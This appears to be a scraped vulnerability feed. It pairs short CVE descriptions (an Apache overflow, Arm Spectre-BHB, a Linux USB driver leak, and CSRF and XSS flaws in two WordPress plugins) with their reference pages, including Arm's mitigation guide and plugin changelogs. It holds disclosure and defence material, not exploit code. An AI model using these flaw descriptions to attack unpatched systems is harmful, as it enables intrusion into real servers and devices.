If LimitXMLRequestBody is set to allow request bodies larger than 350MB (defaults to 1M) on 32 bit systems an integer overflow happens which later causes out of bounds writes. This issue affects Apache HTTP Server 2.4.52 and earlier.

CVE-2022-22721: Apache HTTP Server 2.4 vulnerabilities

Certain Arm Cortex and Neoverse processors through 2022-03-08 do not properly restrict cache speculation, aka Spectre-BHB. An attacker can leverage the shared branch history in the Branch History Buffer (BHB) to influence mispredicted branches. Then, cache allocation can allow the attacker to obtain sensitive information.

**Sorry, your browser is not supported. We recommend upgrading your browser. We have done our best to make all the documentation and resources available on old versions of Internet Explorer, but vector image support and the layout may not be optimal. Technical documentation is available as a PDF Download.**

**Vulnerability of Speculative Processors to Cache Timing Side-Channel Mechanism****Updated on 08/March/2022**

For details on the newly announced Spectre-BHB attack, consult the Spectre-BHB page.

In 2018, Google disclosed research findings identifying security vulnerabilities. Those vulnerabilities were based on cache timing side-channels exploiting processor speculation.  These web pages contain the latest information on those attacks, including a list of affected Arm processors, and their potential mitigations. This page will be periodically updated when new attacks are disclosed, or new information about the processors or software mitigations is made public. 

Cache timing side-channels are a well-understood concept in the area of security research and therefore not a new finding. However, this side-channel mechanism could enable someone to potentially extract some information that otherwise would not be accessible to software from processors that are performing as designed. This is the issue addressed here and in the Cache Speculation Side-channels white paper.

It is important to note that these methods are generally dependent on malware running locally. Practicing good security hygiene by keeping software up-to-date, and avoiding suspicious links or downloads, is imperative for users.

The majority of Arm processors are **not impacted** by any variation of this side-channel speculation mechanism. A definitive list of the subset of Arm-designed processors that are susceptible can be found below.

![](https://developer.arm.com/-/media/Arm%20Developer%20Community/Images/Utility/Arm-Whitepaper-Thumbnail.png?revision=955ee1db-6a44-438c-93bd-2305b6040d3a&hash=5889E09C89280317CF6D0126B1FD812C2C09A85C&hash=5889E09C89280317CF6D0126B1FD812C2C09A85C)

Cache Speculation Side-channels white paper

Download

**What are the attack mechanisms?**

There are four main variants of the exploits, as detailed by Google in their blogpost, that explain in detail the mechanisms:

*   Variant 1: bounds check bypass store (CVE-2017-5753) and bounds check bypass store (CVE-2018-3693)
*   Variant 2: branch target injection (CVE-2017-5715)
*   Variant 3: using speculative reads of inaccessible data (CVE-2017-5754)
*   Subvariant 3a: using speculative reads of inaccessible data (CVE-2018-3640)
*   Variant 4: speculative bypassing of stores by younger loads despite the presence of a dependency (CVE-2018-3639)
*   Straight-line speculation: speculatively executing the instructions linearly in memory following an unconditional change in control flow (CVE-2020-13844). For more information on this attack mechanism and potential mitigations, see the FAQ and this white paper.
*   Spectre-BHB: branch target injection in the same software context (unlike Spectre v2, which injects branch targets across different exception levels) (CVE-2022-23960). For more information on this attack mechanism and potential mitigations, please see the information found on the Spectre-BHB page. 

In addition, Arm has included information on a related variant to 3, noted as 3a, in the table below.

Follow the steps below to determine if there is any vulnerability for your devices and, if vulnerable, then the mitigation mechanisms.

**Step 1**

Check the table below to determine if you have an affected processor.

*   Only affected cores are listed
*   ****Other Arm cores that are NOT listed are NOT affected****
*   **No** indicates the core affected by the particular variant for that version of the core, and the software mitigation should be applied
*   **Yes** indicates affected by the particular variant but has a mitigation (unless otherwise stated)
*   Cortex-R cores typically use a closed software stack. In those environments,  applications or processes are strictly controlled, and therefore not exploitable

Processor

Revision

Variant 1

Variant 2

Variant 3

Variant3a

Variant 4

Spectre-BHB

Cortex-R7

All

Yes

Yes

No

No

No

Yes

Cortex-R8

All

Yes

Yes

No

No

No

Yes

Cortex-A8

All

Yes

Yes

No

No

No

No

Cortex-A9

All

Yes

Yes

No

No

No

No

Cortex-A12

All

Yes

Yes

No

No

No

No

Cortex-A15

All

Yes

Yes

No

Yes

No

No

Cortex-A17

All

Yes

Yes

No

No

No

No

Cortex-A57

All

Yes

Yes

No

Yes

Yes

Yes

Cortex-A65

All

Yes

No

No

No

No

Yes

Cortex-A65AE

All

Yes

No

No

No

No

Yes

Cortex-A72

Prior to r1p0

Yes

Yes

No

Yes

Yes

Yes

Cortex-A72\*  

r1p0 and after

Yes

No

No

No

Yes

Yes

Cortex-A73

Prior to r1p0

 Yes

Yes

No

No

Yes

Yes

Cortex-A73\*

r1p0 and after

Yes

No

No

No

Yes

Yes

Cortex-A75

Prior to r3p0  

Yes

Yes

Yes

Yes

Yes

Yes

Cortex-A75\*

r3p0 and after  

Yes

No

No

N

Yes

Yes

Cortex-A76

Prior to r3p0  

Yes

Yes

No

No

Yes

Yes

Cortex-A76\*

r3p0 and after

Yes

No

No

No

No

Yes

Cortex-A77

Prior to r1p1  

Yes

Yes

No

No

Yes

Yes

Cortex-A77\*

Prior to r1p1  

Yes

No

No

No

No

Yes

Cortex-A78\*

All

Yes

No

No

No

No

Yes

Cortex-A78C\*

All

Yes

No

No

No

No

No

Cortex-A78AE\*

All

Yes

No

No

No

No

Yes

Cortex-A710\*

All

Yes

No

No

No

No

Yes

Neoverse-E1

All

Yes

No

No

No

No

Yes

Neoverse-N1

Prior to r3p0

Yes

Yes

No

No

Yes

Yes

Neoverse-N1\*

r3p0 and after  

Yes

No

No

No

No

Yes

Neoverse-V1\*

All

Yes

No

No

No

No

Yes

Neoverse-N2\*

All

Yes

No

No

No

No

Yes

Cortex-X1\*

All

Yes

No

No

No

No

Yes

Cortex-X2\*

All

Yes

No

No

No

No

Yes

**\* Note:** For Armv8.5-A and Armv9 hardware mitigations added to the indicated Arm CPUs, view the Armv8.5-A/Armv9 Updates document.

**Step 2**

*   If you are running Linux, please follow the directions below according to the variant identified in the table.
*   If you are running Android, please check with Google for the detail of supported kernel versions.
*   If you are running another OS, please contact the OS vendor for details and refer to **For non-Linux operating system** below.
*   For JIT development, please check with the run-time vendor for details.

  
**For Linux**

**Variant 1**

Where vulnerable code sequences (described in the Cache Speculation Side-channels white paper) have been identified, the action required is:

*   Impacted kernel/driver code should be reworked to use the new cross-architectural ‘nospec’ accessors. These accessors implement suitable Arm ‘CSDB’ sequences and ensure the compiler generates speculation safe code sequences for bounds checks.
*   Userspace code implementing software privilege boundaries should be reworked, using the approach discussed in Compiler support for mitigations.

**Variant 2**

The mitigation will vary by processor micro-architecture:

For Cortex-A57, Cortex-A72, Cortex-A73, and Cortex-A75 that have not been updated, please apply kernel patches and Trusted Firmware-A patches provided by Arm.

For Cortex-A8, Cortex-A9, Cortex-A12, Cortex-A15, and Cortex-A17 please apply the kernel patches provided by Arm.

View the available Kernel patches and Trusted Firmware-A patches.

**Variant 3**

For Cortex-A75:

*   Ensure your kernel implements Kernel Page Table Isolation (KPTI), referring to the patches in the branch above. This variant impacts software executing at EL1/EL0 which share a translation regime. KPTI is used to unmap the kernel from a process address space when that process is running. 

**Variant 3a**

For Cortex-A15, Cortex-A57, and Cortex-A72:

*   In general, it is not believed that software mitigations for this issue are necessary. However, an update for the latest release of the Cortex-A72 does include a hardware mitigation for this issue. Please download the Cache Speculation Side-channels white paper for more details.

**Variant 4**

For Cortex-A76 and Neoverse N1:

Mitigation is based on dynamically disabling memory disambiguation via an implementation-defined control register. Implementing this functionality involves updates to Trusted Firmware. Linux patches were merged in the 4.18 release of the Linux kernel and backported to the 4.14 and 4.9 stable kernels.

Release versions of Neoverse N1, as well as updated versions of the Cortex-A76, have made the control feature architecturally defined, as well as added additional barrier operations to help software mitigate this issue. Support for the architectural mitigations was added to Linux in the 4.20 release.

For Cortex-A57, Cortex-A72, Cortex-A73, and Cortex-A75:

Mitigation is based on disabling a hardware feature (memory disambiguation) at boot via an implementation-defined control register.

View the Trusted Firmware-A Advisory.

**For non-Linux operating systems**

**Variant 2**

The mitigation will vary by processor micro-architecture:

For Cortex-A9, Cortex-A12, Cortex-A17, Cortex-R7, and Cortex-R8, invalidate the branch predictor using a BPIALL instruction. See below for mitigation of remaining affected cores.

For Cortex-A8:

*   Invalidate the branch predictor using a BPIALL instruction.
*   Set ACTRL\[6\] to 1 during early processor initialization.

For Cortex-A15:

*   Set ACTLR\[0\]==1 from early initialization of the processor.
*   Invalidate the branch predictor by performing an ICIALLU instruction.

For Cortex-A57 and Cortex-A72:

*   Do one of the following:
    *   Disable the current stage 1 MMU, execute an ISB, re-enable the MMU and execute an ISB. This must be done in an area of memory where the VA and the IPA (or PA if there is only one stage of translation) are the same.
    *   Do an ERET from EL3 where SCTLR\_EL3.M==1 to S-EL1 where SCTLR\_EL1.M=0 followed by an SMC back to EL3.

For Cortex-A73:

*   In AArch32: Invalidate the branch predictor using a BPIALL instruction.
*   In AArch64: Switch into AArch32, then perform a BPIALL - this can be done by calling Secure EL1 code, which is typically using AArch32, to do the BPIALL.

For Cortex-A75:

*   In AArch32: Invalidate the branch predictor using a BPIALL instruction.
*   In AArch64: Switch into AArch32, then perform a BPIALL - this can be done by calling Secure EL1 code, which is typically using AArch32, to do the BPIALL.

**Variant 4**

The mitigation varies by processor micro-architecture. Memory disambiguation should be disabled at boot by setting the relevant control register bit:

For Cortex-A57 and Cortex-A72:

*   Set bit 55 (disable load pass store) of CPUACTLR\_EL1 (S3\_1\_C15\_C2\_0).

For Cortex-A73:

*   Set bit 3 of S3\_0\_C15\_C0\_0.

For Cortex-A75:

*   Set bit 35 of CPUACTLR\_EL1 (S3\_0\_C15\_C1\_0)

For Cortex-A76:

*   Set bit 16 of CPUACTLR2\_EL1 (S3\_0\_C15\_C1\_1)

Please consult the latest version of the white paper for additional mitigations.

**What about future Arm Cortex processors?**

All future Arm Neoverse and Cortex processors provided to our licensees will be resilient to this style of attack, or will be mitigated by enhancements made to the Kernel and firmware. For details on updates to affected CPUs, as well as descriptions of mitigations added to Armv8.5-A, view the Armv8.5-A CPU Updates document.

Arm recommends that users deploy the software mitigations described in the Cache Speculation Side-channels white paper, and in the Spectre-BHB white paper, where protection against malicious applications is required.  Arm's Security Response Team will continue to research any potential mitigations, and work closely with our customers and partners.  Please refer to the FAQ for additional information.

CVE-2022-23960: Speculative Processor Vulnerability – Arm Developer

An issue was discovered in the Linux kernel before 5.16.12. drivers/net/usb/sr9700.c allows attackers to obtain sensitive information from heap memory via crafted frame lengths from a device.

CVE-2022-26966

Cross-Site Request Forgery (CSRF) vulnerability affecting Delete Marker Category, Delete Map, and Copy Map functions in WP Google Map plugin (versions <= 4.2.3).

*   Details
*   Reviews
*   Installation
*   Support
*   Development

This google maps plugin allows you to create google maps shortcodes to display responsive google maps on pages, widgets and custom templates. Show custom markers on each google maps and display messages inside infowindow on marker click.

**Watch Video**

Google autosuggest enabled location form helps you to create unlimited markers and then assign markers to a google map. It’s super easy.

> Here is a quick highlight on the numerous customizable features offered by the free and pro versions of the **WP Google Map Pro Version**.

**Lite Version (Free)**

*   Add unlimited locations with various information.
*   Assign multiple locations to a single map.
*   Display a info window message to any location.
*   Map Marker Infowindow Open On: Mouse Click or Mouse Hover.
*   Display map on posts/pages using shortcode.
*   Decide center latitude and longitude for each map separtely.
*   Easy way to assign category to any location.
*   Select your marker icon for markers.
*   Easily edit or delete map functionality.
*   Assign your own markers to categories or choose colorful markers from +500 readymade markers provided by the Maps Icons Collection.
*   Select among 4 map type : Roadmap,Satellite,Hybrid,Terrain
*   Set your map height and width.
*   Set Map zoom level.
*   Map can be Draggable
*   Display traffic real time conditions and overlays using Layers.
*   Add bicycle path information to your maps using the Bicycling Layer.
*   Enable Map Transit layer
*   Marker Animation on Click or Mouse hover the marker.
*   45° imagery functionality
*   Add circle in your Maps plugin
*   Create a map just in seconds.
*   Street view supported
*   widget supportive : Display Google Maps on sidebars using widget.
*   Pov Heading and Pov Pitch for street view.
*   Fully Responsive.Display your map perfectly on all devices.
*   Create 100% responsive maps effortlessly.Tested on real devices.
*   A Cross Browser Compatible plugin. Fully tested on IE8, IE9, IE10 and all major browsers
*   Multi-lingual Supported.
*   Multisite Enabled and ability to activate it network wide.
*   Map Stylization : Customizable Google maps style from https://snazzymaps.com.
*   Search control on frontend map to search location easily.
*   Filter markers by category.

**Features available in Pro version**

\[WP Google Map Pro\] (https://codecanyon.net/item/advanced-google-maps-plugin-for-wordpress/5211638) offers awesome features such as

*   Marker Clustering : Enable marker clusters if you have too many locations.
*   Map Layers : Display Traffic Layer , Bicycling Layer, Transit layer
*   Import/Export Locations : Import Export Locations supported using CSV.Sample csv is attached in pro version.
*   Draw shapes : rectangle, circle, polygon and polyline.
*   Display unlimited shapes. Display Message on shape click or Redirect to external link.
*   Direction & Route : Directions & Route Suggestion. Display directions results in KM and MILES.
*   Listing : Display listing in grid or list style. Fully responsive.
*   Sort listing by location, category and address alphabetically in location listing.
*   Marker Category : Assign multiple categories to a location.
*   Infowindow Contents: Customize infowindow contents with help of Placeholders.
*   Display Posts Information, custom fields, taxonomies and featured images on infowindow message using placeholders.
*   Unlimited number of map markers and locations.
*   Set your own google map marker icon
*   Drag and drop feature for markers, custom animation support
*   Allows to display the user location on map.
*   Nearby locations based on user’s current location.
*   Display Posts/Pages or Custom Post Types on google maps using **custom fields**.
*   Center the map based on visitor’s current location.
*   Define overlays on Google maps via an easy to use interface.
*   Integrate GEOJSON in to google maps.
*   Display multiple Kml/Kmz Layer on the map.
*   Fusion Table Layers.
*   Add Geo location
*   Add any number of Google maps on pages/posts/sidebars.
*   Allows to insert the map as widget on sidebars.
*   Add unlimited locations using an easy to use interface for Google Maps.
*   Display location title, location category, location latitude, location longitude with location message in the infowindow.
*   Create unlimited maps and display on posts/pages using shortcode or in sidebar using widget.
*   Design your own Google map skins easily. Turn ON/OFF roads, places, water area.
*   Ability to display infowindow on mouse click on mouse hover.
*   Display your map perfectly on all devices. Create 100% responsive maps effortlessly.
*   Multi-lingual Supported.
*   Display physical maps based on terrain information.
*   Display Google Earth satellite images on just one click.
*   Display maps in a blend of normal and satellite views.
*   Setup POV Heading and POV Pitch of Street View to customize Street View output of a location.
*   Full support of controls of the Google map, such as zoom control, map type control, scale control, street view control, fullscreen and rotate control
*   Drag and drop feature for markers, custom animation support
*   Modify Locating Listing using Placeholder.
*   Hooks Supported – Use actions & filters to modify map,markers,listing and associated html on fly.
*   Display locations listing with filters & pagination. Fully customizable using backend settings and hooks.
*   Use “wpgmp\_geo\_tags\_args”, “wpgmp\_geo\_featured\_image”, “wpgmp\_geotags\_placeholder”, “wpgmp\_geotags\_content” hooks to extend Posts on google maps functionality as you want.
*   Use External Database or Sources to add markers on google maps using new filter wpgmp\_marker\_source.
*   Load markers from external database or API sources with help of filters (Hooks).
*   A Cross Browser Compatible plugin. Fully tested on IE8, IE9, IE10 and all major browsers
*   Multisite Enabled and ability to activate it network wide.
*   Visit our Pro Edition WP Google Map

**Live Examples**

*   Google Maps Pro Plugin Live Demo

**Links**

Available on Codecanyon |  
Live Examples |  
Developed by flippercode

This section describes how to install the plugin and get it working.

    1.  Upload the <strong>wp-google-map-plugin</strong> directory to the <strong>/wp-content/plugins/</strong> folder
    
    2.  Once the plugin is uploaded log into WordPress and go to <strong>Plugins</strong>
    
    3.  Find the <strong>wp-google-map-plugin</strong>plugin and click Activate Plugin
    
    =How to work=
    
    1. Go to <strong>settings</strong> page of plugin and insert your google maps api key. see full instruction [How to create Api key](https://www.wpmapspro.com/docs/how-to-create-an-api-key/)
    
    2. First create your locations using 'Add Location' page.
    
    3. Then create your first map using 'Add Map' page and assign your locations.
    
    4. Each map is assoicated to a shortcode. You can view shortcode on 'Manage Maps' and copy and paste it on your pages or posts. You can display your google maps in the sidebar using widget.
    

**Can I create a custom marker ?**

Yes, you can upload your own marker image or you can choose from readymade icons.

**Do I need to calculate latitude & longitude myself ?**

No, Address field is google autosuggest enabled so you just start typing and choose your address. Latitude & Longitude will be calculated automatically.

**How many locations I can assign to the map?**

You can assign as many as location you want to display on google maps.

**How to display map on page?**

Go to ‘Manage Maps’ and copy the shortcode for your map. Each map will have own shortcode. You just paste that on your page.

**Can I display map using widget?**

Yes, First create your map and then you can display your map in sidebar from widget section.

**How to register google maps api key?**

Go to \[Google Maps API console\]  
(https://console.developers.google.com/flows/enableapi?apiid=maps\_backend,geocoding\_backend,directions\_backend,distance\_matrix\_backend,elevation\_backend,places\_backend&keyType=CLIENT\_SIDE&reusekey=true&pli=1)  
and you can create your google maps api key here.

We have a guide \[Important Changes in Google Maps\]  
(https://console.developers.google.com/flows/enableapi?apiid=maps\_backend,geocoding\_backend,directions\_backend,distance\_matrix\_backend,elevation\_backend,places\_backend&keyType=CLIENT\_SIDE&reusekey=true)

For troubleshooting releated to \[Google Maps Api Key\]  
(https://www.linkedin.com/pulse/important-changes-google-maps-api-v3-website-owners-sandeep-kumar)

**How to upgrade to pro version?**

You can purchase Google Maps Pro Version and then just keep your lite version deactivated and then activate the pro version. You’ll not loss any of your data. Your all data will be migrated to pro version automatically.

**Do we have Live Demo?**

Yes, You can click on Google Maps Pro Live Demo and mail us at hello at flippercode dot com if any pre-purchase query.

**Do we have a Documentation?**

Yes, You can click on WP Google Map Pro Guide and you will get all documentation with proper steps and video tutorials.

**Do we have offer refund?**

Yes, You can get refund any time if pro version is not suitable for you.

**Do we have offer customization?**

Yes, You can mail us your requirement at hello at flippercode dot com.

![](https://secure.gravatar.com/avatar/15dffc16f6b853074f071d2c1e84e51e?s=60&d=retro&r=g)

The support team was very fast and fixed my problem - even with just the free Plan Also very good Plugin and easy to use!

![](https://secure.gravatar.com/avatar/ed670c5e939abc7bd9908eafc762cac1?s=60&d=retro&r=g)

HI, Special thanks to Sandeep Kumar (Founder, Flipper Code Private Limited) really very help full He sorted plugin conflict on my site in very short time. I am very happy with plugin support.

![](https://secure.gravatar.com/avatar/50692cafc999b1a4030c0caff9b4baef?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/d1e1ba9d2e108d18d75214ce8742565e?s=60&d=retro&r=g)

![](https://secure.gravatar.com/avatar/5e28959a11610330b6212840b69a0d48?s=60&d=retro&r=g)

Matthew Lau responded with answers to my support questions quickly and was very friendly, clear and concise. Thank you Matthew! ~Betty

![](https://secure.gravatar.com/avatar/55ee27456d4f565f186e7a36f736e1b5?s=60&d=retro&r=g)

Flippercode helped me implement what I was looking for. Their plugin customization was extremely affordable and their responses were super fast! The plugin itself is extremely user friendly too. We will definitely be purchasing from them again for our other sites!

Read all 107 reviews

“WP Google Map Plugin” is open source software. The following people have contributed to this plugin.

Contributors

*   ![](https://secure.gravatar.com/avatar/133bb52f2a720d6c050d3dc151ed47ad?s=32&d=mm&r=g) Flipper Code

**4.2.5**

*   Fix : Infowindow HTML tags were stripping while updating the map.

**4.2.4**

*   Fix : Confirmation popup added on bulk delete action for category,location and map.
*   Fix : Security issue fixed for delete and copy map operation.

**4.2.3**

*   Fix : ‘Select Category’ text displayed in marker category filter dropdown is now translatable.
*   Fix : Fixed a logical validation issue on Add location form in back-end.

**4.2.2**

*   Fix : UI issues of map controls caused by currently activated theme fixed.

**4.2.1**

*   Fix : Warnings removed from frontend when map is deleted from backend.

**4.2.0**

*   New : Confirmation boxes added before deleting locations / marker categories / maps.
*   New : Addons introduction page updated.

**4.1.9**

*   Fix : One warning and one notice fixed on add map page, code optimised.

**4.1.8**

*   New : Dismissable notice to buy premium version plugin added.

**4.1.7**

*   New : Better UI interface for backend forms.

**4.1.6**

*   Fix: Calling files remotely fixed. Removed shorthand URLs. Text domain corrected. WordPress tested upto version number updated. Data sanitisation & escaping work done. Unused code removed. Design issue fixed on manage location and manage maps page. New filter added.

**4.1.5**

*   Fix: SQL vulnerability issue fixed.

**4.1.4**

*   Fix: SQL security issue fixed.

**4.1.3**

*   New: New hooks added before and after map rendering.
*   New: Extentions related information provided.

**4.1.2**

*   Fix: Missing translation files added.

**4.1.1**

*   New: Search control on map for easy location searching.
*   New: Filter markers by category.

**4.1.0**

*   Fix: Removed reported vulnerability. Updated code in data save modules and applied more security.
*   New: Display google maps in different beautiful skins. Snazzy maps support integrated.

**4.0.9**

*   Fix: Removed PHP Warnings and coding standard updated.

**4.0.8**

*   Fix: Broken link fixed.

**4.0.7**

*   Fix: Optimized CSS and removed unused CSS, Files and Code.

**4.0.6**

*   Fix: Optimized CSS and removed unused CSS, Files and Code.

**4.0.3**

*   Fix: Removed unused file.

**4.0.2**

*   Fix: call\_user\_func\_array is resolved.

**4.0.1**

*   Fix: Blank Page on Add Map is fixed.

**4.0.0**

*   Improvement: New UI for Backend Pages and Forms.
*   New: Ability to customize info window message using placeholder.
*   New: Ability to show info window on click or mouseover.
*   New: Set default marker icon for the map.

**3.2.0**

*   Security Fix: Security vulnerablity is resolved.

**3.1.6**

*   Improvement Fix: How to use plugin instruction added.

**3.1.5**

*   Improvement Fix: CSS fixed for wordpress 4.6.

**3.1.4**

*   Improvement Fix: Missing google maps api key notification added on location page.

**3.1.3**

*   Fix: Indexed Warning is resolved in class.initial-core.php.

**3.1.2**

*   Fix: XSS Vulnerability is resolved.

**3.1.1**

*   Fix – Access level to WP\_List\_Table\_Helper::pagination() must be public.

**3.1.0**

*   New – resize\_map() function is added to correct the grey map in tabs issue.
*   Improvement – Remove directory reading functions.

**3.0.9**

*   Multi-site bug resolved.

**3.0.5**

*   Lang slug changed to wp-google-map-plugin as per wordpress.org requested.

**3.0.4**

*   links in the info window is broken due to missing stripslashes function – resolved.

**3.0.3**

*   wpgmp\_admin\_overview capability added to read how to use instructions.

**3.0.2**

*   echo $before\_widget and $after\_widget added for correct widget output.

**3.0.1**

*   Category icon broken issue resolved.
*   Markers are not displaying on the map, issue resolved.
*   Infowindow Message is not showing on marker click, issue resolved.

**3.0.0**

*   Sanitize all inputs and outputs.
*   New file & folder structure.
*   Object oriented based coding according to wordpress standard coding rules.
*   Clean bootstrap based design.
*   Ability to show any number of google maps on a single map.
*   Decide center latitude and longitude for each map.
*   POV Heading and Pov Pitch for street view.
*   Sub categories supported.
*   Redirect to URL on marker click.
*   City, State, Country and Postal code new fields in location form.
*   Apply marker animation.
*   Position google maps controls e.g Pan,Zoom,May Type with easy to use interface.

**2.3.10**

*   CSRF Protection added on add/edit location.
*   CSRF Protection added on add/edit map.
*   CSRF Protection added on add/edit category.

**2.3.9**

*   Display more than 10 locations on Manage Locations using Screen Options.
*   Display more than 10 maps on Manage Categories using Screen Options.
*   Display more than 10 categories on Manage Maps using Screen Options.
*   SSL Supported.

**2.3.8**

*   locations, maps and category was not showing on manage pages in wordpress 4.2 resolved.

**2.3.7**

*   Improvement Fix: Fixed add\_query\_arg() and remove\_query\_arg() usage to avoid XSS Vulnerability.

**2.2.0**

*   Twitter Bootstrap 3 Based.
*   Solved Featured Image Problem.

**2.1.0**

*   Infowindow CSS Improved.
*   Optimized Code for Fast Map Experience.
*   Solved Layer Display Problem.

**1.2.0**

*   Zero Configuration Enabled.
*   Managed Navigation.
*   Custom Icon using Widget.

**1.1.0**

*   Solved zoom toolbar bug.
*   Solved white lines on the map.
*   Added Widget Support.
*   Added multiple maps on a page support.

CVE-2022-25600: WP Google Map Plugin

Reflected Cross-Site Scripting (XSS) vulnerability affecting parameter &tab discovered in Contact Form X WordPress plugin (versions <= 2.4).

*   Details
*   Reviews
*   Installation
*   Support
*   Development

> Displays a user-friendly contact form that your visitors will love.

CFX: Contact form reinvented. Fast and friendly. Fresh and clean. Awesome for everyone 🙂

**Overview**

Install, activate, and then display the form anywhere, using the widget, shortcode, or template tag. Here is an overview of Contact Form X:

*   Easy to use
*   Simple and secure
*   Lightweight and super fast
*   Provides multiple form styles
*   Customize just about everything
*   Display the contact form anywhere
*   Change the order of the form fields
*   Send email to multiple recipients
*   Complete documentation via Help tab
*   Excellent free plugin support

> “The famous spam filter SpamAssassin” scores CFX = zero spam!

For more details, check out the “Screenshots” section, below.

**Form Fields**

Easily choose which fields to display in the form. Each field may be set as required, optional, or disabled. Choose from these fields:

*   Name
*   Website
*   Email
*   Subject
*   Custom Field
*   Challenge Question
*   Message
*   Google reCaptcha (v2 or v3 Invisible)
*   Carbon Copy
*   Agree to Terms

You can change the order of these fields and customize their labels and placeholders, everything is super flexible.

**For a live demo** of Contact Form X, visit my contact page at Perishable Press. Note: the form at Perishable Press is highly customized with CSS, but all other functionality is the same. Feel free to send a test email to see how it works, I won’t mind 😉 Also check out CFX in the “Screenshots” section (below) for a better idea of how the default form is styled out of the box.

**Privacy**

To help protect user privacy, Contact Form X provides the following features:

*   Agree to terms checkbox, customizable
*   Choose which fields to include with the form
*   Option to disable collection of user IP address and other data
*   Note: this plugin uses cookies to enhance form functionality

Basically, this plugin enables visitors to send a message via contact form. Any information the user enters into the form will be sent directly to the recipient(s) according to plugin settings. When enabled in the plugin settings, details about each sent message will be stored in the WordPress database. Visit the “Advanced” plugin settings to control this and other data-collection features.

**Note:** This plugin provides an option to enable Google reCaptcha, which is provided by Google as a third-party service. For details on privacy and more, please refer to official documentation for Google reCaptcha.

CFX is developed and maintained by Jeff Starr, 10-year WordPress developer, security specialist, and book author.

**Geeky Stuff**

Lots of goodness for the geeks among us:

*   Built with the WordPress API
*   Ajax-powered form submission
*   Remembers form data on error
*   Google reCaptcha version 2
*   NEW: Google reCaptcha version 3 (invisible)
*   NEW: Drag/drop ordering of the form fields
*   View your email messages on the WP Dashboard
*   Option to enable/disable storing of email data in database
*   Display form via widget, shortcode, or template tag
*   Five CSS themes: Default, Classic, Micro, Synthetic, Dark
*   Optionally collect user data like IP, host, and referrer
*   Works perfectly with or without Gutenberg Block Editor
*   Focused on performance, security, and usability
*   Include extra form and user info with each message
*   Customize the form’s success and error messages
*   Provides plenty of useful hooks for developers
*   Targeted loading of CSS and JavaScript assets
*   One-click remove email data from database
*   One-click restore default options
*   Translation ready

Contact Form X is a fresh new, lighter alternative to the heavier contact forms out there. CFX is lightweight yet fully featured. As they say, “everything you want, nothing you don’t”.

**Support development of this plugin**

I develop and maintain this free plugin with love for the WordPress community. To show support, you can make a donation or purchase one of my books:

*   The Tao of WordPress
*   Digging into WordPress
*   .htaccess made easy
*   WordPress Themes In Depth
*   Wizard’s SQL Recipes for WordPress

And/or purchase one of my premium WordPress plugins:

*   BBQ Pro – Super fast WordPress firewall
*   Blackhole Pro – Automatically block bad bots
*   Banhammer Pro – Monitor traffic and ban the bad guys
*   GA Google Analytics Pro – Connect WordPress to Google Analytics
*   USP Pro – Unlimited front-end forms

Links, tweets and likes also appreciated. Thanks! 🙂

**Installing the plugin**

1.  Upload the plugin to your blog and activate
2.  Configure the plugin settings as desired
3.  Display the form on any post or page via shortcode: `[contactformx]`

Visit the Help tab on the plugin settings page for complete documentation.

More info on installing WP plugins

**Uninstalling**

This plugin cleans up after itself. All plugin settings will be removed from your database when the plugin is uninstalled via the Plugins screen.

Note: uninstalling/deleting the plugin via the WP Plugins screen results in the removal of all settings and email data from the WP database.

**Like the plugin?**

If you like Contact Form X, please take a moment to give a 5-star rating. It helps to keep development and support going strong. Thank you!

**What about the styles?**

The plugin provides five form styles (themes): Default, Classic, Micro, Synthetic, and Dark.

The first three themes (Default, Classic, Micro) employ minimal, mostly structural styles. One of the benefits of using the minimal styles is that they allow your WordPress theme to set the form’s appearance. And that’s good because it helps keep your pages looking visually consistent across your site.

The last two themes (Synthetic, Dark) go much further with the stylings. The Synthetic and Dark styles will override any/most CSS applied via your WordPress theme. So if the contact form looks weird or whatever when trying Default, Classic, or Micro, try either Synthetic or Dark should do the trick.

**What about targeted loading of assets?**

Sure. By default, Contact Form X loads its assets (CSS and JavaScript) on every front-end page. So if you display a contact form in your sidebar, it will work on all pages.

Some sites prefer to have a “Contact” page, and then just display the contact form in one location. In this scenario, it doesn’t make sense to include plugin assets on every front-end page. So CFX provides a setting called “Targeted Loading” (under the Advanced tab). There you can enter the URL of the page that displays the contact form. That way, the plugin will know to load assets only on that page. This is an excellent way to help keep things optimized for performance and so forth.

**How to change the button color?**

In the plugin settings, visit the “Appearance” tab. There you will see the first option, “Form Style”. That tells you which styles are used for the form. So to change the button color, scroll down to locate the styles that you are using (e.g., Default, Classic, Micro, et al). To change the color of the submit button, add the following line to whichever styles you are using:

    #cfx .cfx-button { background: red !important; }
    

Change the `red` to whatever color you want. Can use hex values, rgba, or any valid CSS properties. Save changes and done.

Visit the Advanced tab and enable “Extra Email Info” option. Save changes and done.

**How to defer or async loading of JavaScript?**

The recommended way to defer or async load JavaScript is to use a trusted plugin, such as this one.

**How to set maxlength on the Message textarea?**

It is possible to set a `maxlength` attribute on the Message field, a textarea. To do so, add the following code via (child) theme or custom plugin:

    function contactformx_textarea_maxlength($chars) { return 500; }
    add_filter('contactformx_textarea_maxlength', 'contactformx_textarea_maxlength');
    

You can adjust the number of characters by changing `500` to any number.

**How to display the form shortcode inside a widget?**

Enable the Advanced option, “Widget Shortcodes”. Save changes and done.

**How to change the language for Google reCaptcha?**

By default, the Google reCaptcha field is displayed in English. To change that to some other language, first locate the two-digit abbreviation for your language here. Then add the following code to your theme (or child theme) functions.php, or add via simple custom plugin:

    function contactformx_recaptcha_querystring($query) { return 'en'; }
    add_filter('contactformx_recaptcha_querystring', 'contactformx_recaptcha_querystring');
    

Notice where it says `en`, that is the two-character language code you want to replace with your own. Then save changes and done.

**How to remove or empty the old database table?**

In CFX v1.9, sent emails optionally may be stored in the database as custom post types. Before CFX v1.9, email data was stored in its own/separate database table. So that means users who are upgrading from previous versions to 1.9 or better will have an unused email table in their database. It won’t hurt or affect anything, but you may want to empty or remove it to help save space.

**Important:** the following steps are for users of CFX v1.9+ who have upgraded from a previous version. Do NOT follow these steps if using CFX versions less than 1.9, OR if you never have used any version of CFX less than 1.9.

To **empty** the old/unused CFX database table:

1.  Log in to WordPress as admin-level user
2.  Create a new page and leave in Draft status
3.  Add `[contactformx_legacy_empty_table]` to the page
4.  Preview the page on the frontend
5.  Click the link to Empty the CFX database table
6.  After seeing the success message, delete the draft page and shortcode

To **remove** the old/unused CFX database table:

1.  Log in to WordPress as admin-level user
2.  Create a new page and leave in Draft status
3.  Add `[contactformx_legacy_drop_table]` to the page
4.  Preview the page on the frontend
5.  Click the link to Empty the CFX database table
